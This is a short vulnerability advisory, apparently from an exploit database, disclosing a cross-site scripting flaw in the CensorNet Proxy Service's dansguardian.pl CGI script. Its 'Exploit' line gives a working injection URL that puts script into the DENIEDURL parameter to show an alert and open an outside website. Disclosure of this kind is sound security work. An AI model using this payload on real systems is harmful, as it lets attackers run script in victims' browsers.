Bug: CensorNet: Cross Site Scripting Vulnerability (WLB-2007100120 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: CensorNet: Cross Site Scripting Vulnerability
 Credit: Richard Maudsley
 Date: 2007.10.25
 CWE: CWE-79 (Show similar)
 CVE: CVE-2003-1506 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Low
No
Yes

Hello,

A cross site scripting vulnerability exists in the CensorNet Proxy Service
(www.censornet.com) that allows scripting (and html) to be passed to the
cgi script and displayed in the web browser.

Exploit:
http://SERVER/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Count
er-Strike__servers__from__&#163;10_per_month!');window.open("http://www.socke
tx.co.uk")</script>

Regards,
Richard Maudsley

- -------------------------------------------------------------------
This email has been sent from the Royal Borough of Windsor and Maidenhead LEA system, if you have cause for
complaint regarding the
content of this email please contact abuse (at) rbwm (dot) org [email concealed]
- -------------------------------------------------------------------

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com